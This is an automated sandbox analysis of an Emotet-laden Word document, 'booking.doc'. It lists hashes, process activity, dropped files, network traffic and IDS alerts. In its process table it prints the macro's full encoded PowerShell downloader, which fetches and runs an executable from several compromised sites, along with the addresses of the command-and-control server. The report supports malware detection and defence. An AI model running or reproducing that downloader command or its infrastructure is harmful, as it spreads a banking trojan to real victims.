File name: | booking.doc |
Full analysis: | https://app.any.run/tasks/e59955a5-42ba-499a-8bde-2c409ee615c9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 07:46:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolore sunt a., Author: Laura Brehmer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 21:33:00 2019, Last Saved Time/Date: Fri Nov 15 21:33:00 2019, Number of Pages: 1, Number of Words: 21, Number of Characters: 121, Security: 0 |
MD5: | 45CF8F0BC99856BC508DF2242BF08DB1 |
SHA1: | 8539C7075E7060946E5774779429F0ADCEE08170 |
SHA256: | D115EB3832178142E9A59F565E63729F54E110CC963DC7F10B95F5BEFF943CB7 |
SSDEEP: | 3072:cxTyQH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/+qls5nIo:cxTyQHNaqjSzGdD48+aPOnX8s5n3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Forms 2.0 Form |
---|---|
CompObjUserTypeLen: | 25 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 141 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 121 |
Words: | 21 |
Pages: | 1 |
ModifyDate: | 2019:11:15 21:33:00 |
CreateDate: | 2019:11:15 21:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Laura Brehmer |
Subject: | - |
Title: | Dolore sunt a. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1316 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\booking.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
688 | powershell -w hidden -enco JABPAGsAcQBoAHEAcQB5AGwAZQB1AHoAYwB5AD0AJwBOAGUAYQBqAHIAegBhAGoAaQB3AG8AdgBvACcAOwAkAEgAbwBsAHgAbABtAG0AZwAgAD0AIAAnADcAOQAwACcAOwAkAEIAZABwAHAAbwB2AHAAawBiAGIAagBjAD0AJwBFAHEAdAB5AHgAaQBtAHcAJwA7ACQAWQBtAHcAYQByAGEAdQBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAG8AbAB4AGwAbQBtAGcAKwAnAC4AZQB4AGUAJwA7ACQATwBiAGgAbABiAHYAawBxAGoAYQB4AHoAaQA9ACcAUgBwAHEAaQBwAHAAeQBnAGgAcgAnADsAJABLAG8AbQBpAGcAdAB3AHEAegBrAHQAeAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAEwASQBFAG4AdAA7ACQATQBjAGgAdgBuAHYAeAB6AGIAYQBiAD0AJwBoAHQAdABwAHMAOgAvAC8AcwB1AGEAcgBlAHoAYwBvAHIAcgBlAGQAbwByAGUAcwAuAGMAbAAvAGMAZwBpAC0AYgBpAG4ALwBrAFoAWABVAHgAWAAvACoAaAB0AHQAcABzADoALwAvAHcAYQB0AGUAcgAtAGMAbwBvAGwAZQBkAC0AYwB5AGMAbABlAHMALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBOAE0ASAB4AEcAagAvACoAaAB0AHQAcABzADoALwAvAGEAawBjAGEAbgAtAHQAdQByAGkAegBtAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AHoAdgBvAGkALQBoAGkAZQA2AHcAbgBwAHkAdwBlAC0AMgA4ADUANQA0ADEAMgA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYgBpAGQAYQAxADIAMwAuAHAAdwAvAHQAZwA5AHcALwAzAGYAOAAtADYAdQBmADMAZAA2AGsAZgBvAGUALQAzADQANgAwADEANQAyADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AGkAbgBxAGkAbABhAHcAeQBlAHIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBqAGgAbwAtAHgAbgAwAHEALQAwADEAMgAwADkANQAzADcAOQA0AC8AJwAuACIAUwBwAEwAYABpAHQAIgAoACcAKgAnACkAOwAkAFAAdwBtAGkAZgBnAHEAYgA9ACcARQBpAGcAcgBzAHQAYwBkAGYAaAByACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAGcAagBkAGQAaABsAGYAaQBoAGkAcwAgAGkAbgAgACQATQBjAGgAdgBuAHYAeAB6AGIAYQBiACkAewB0AHIAeQB7ACQASwBvAG0AaQBnAHQAdwBxAHoAawB0AHgALgAiAGQAYABvAGAAdwBgAE4AbABvAGEAZABGAGkATABlACIAKAAkAEgAZwBqAGQAZABoAGwAZgBpAGgAaQBzACwAIAAkAFkAbQB3AGEAcgBhAHUAZwApADsAJABUAHcAbwBpAGoAcAB1AHoAdAA9ACcAVgB1AHcAcgByAHMAcwBiAHgAYwBsAGgAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABZAG0AdwBhAHIAYQB1AGcAKQAuACIAbABlAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMQA2ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAVAAiACgAJABZAG0AdwBhAHIAYQB1AGcAKQA7ACQARQBlAGUAbQByAGsAYgBxAHQAbAByAHkAaAA9ACcATwBrAGcAbQB3AHkAdwBrAGwAbQBvAHAAJwA7AGIAcgBlAGEAawA7ACQASABwAGwAawBtAGwAcQB2AD0AJwBKAHUAZABjAGcAYQB1AGwAcQBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAcABiAHkAaQB1AHMAegA9ACcASwBuAGwAdwBmAG4AdQBhAGIAdABjAHYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
616 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Task Manager Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2576 | "C:\Windows\system32\taskmgr.exe" /1 | C:\Windows\system32\taskmgr.exe | taskmgr.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Task Manager Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
912 | "C:\Users\admin\790.exe" | C:\Users\admin\790.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1596 | --4c25e06c | C:\Users\admin\790.exe | 790.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2192 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 790.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3116 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1764 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\20FB.tmp" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4000 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | explorer.exe | |
User: admin Integrity Level: HIGH Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB1F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2GUME724QN2WQOO0PKC.temp | — | |
MD5:— | SHA256:— | |||
1764 | serialfunc.exe | C:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp | — | |
MD5:— | SHA256:— | |||
1764 | serialfunc.exe | C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp | — | |
MD5:— | SHA256:— | |||
1764 | serialfunc.exe | C:\Users\admin\Documents\Outlook Files\[email protected] | — | |
MD5:— | SHA256:— | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3746CA4.wmf | wmf | |
MD5:FA29F4F0BC316F8701A808850C6138C5 | SHA256:60FC4D471A9FC8C72719E717B393D68B477BAC855FA58B84481E20EF67295C30 | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C730E7BE.wmf | wmf | |
MD5:FB04D014602BDB455CA309B315CC677F | SHA256:65E4794B8C32EEAC4AFFF0A2D4A229DF02A70A3A57924C234488A025D838C425 | |||
688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b977.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
688 | powershell.exe | C:\Users\admin\790.exe | executable | |
MD5:6CA5B27039A565878D3441BD97A814A0 | SHA256:3E06BC2EBF7F85B2C846633A6A0F1A596EA54138D9D56486AAF69AA3020CA607 | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B5F78A7.wmf | wmf | |
MD5:143261C15C728A68639D8F0365E24274 | SHA256:AF3D5F8D981F4B682CDB307013A79686885C95931AE5CAAC4C912DA76DB6E5FA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3116 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/attrib/merge/add/merge/ | RU | binary | 240 Kb | malicious |
3116 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/img/ | RU | binary | 148 b | malicious |
3980 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/entries/arizona/add/merge/ | RU | binary | 148 b | malicious |
— | — | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2Fz5hY5qj0aEmX0H4s05bY%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
688 | powershell.exe | 145.14.145.234:443 | water-cooled-cycles.000webhostapp.com | Hostinger International Limited | US | shared |
1252 | gup.exe | 104.31.89.28:443 | notepad-plus-plus.org | Cloudflare Inc | US | shared |
3980 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
688 | powershell.exe | 138.117.149.13:443 | suarezcorredores.cl | Gtd Internet S.A. | CL | suspicious |
3116 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
— | — | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
suarezcorredores.cl |
| suspicious |
water-cooled-cycles.000webhostapp.com |
| shared |
notepad-plus-plus.org |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
688 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
3116 | serialfunc.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3116 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3116 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3980 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|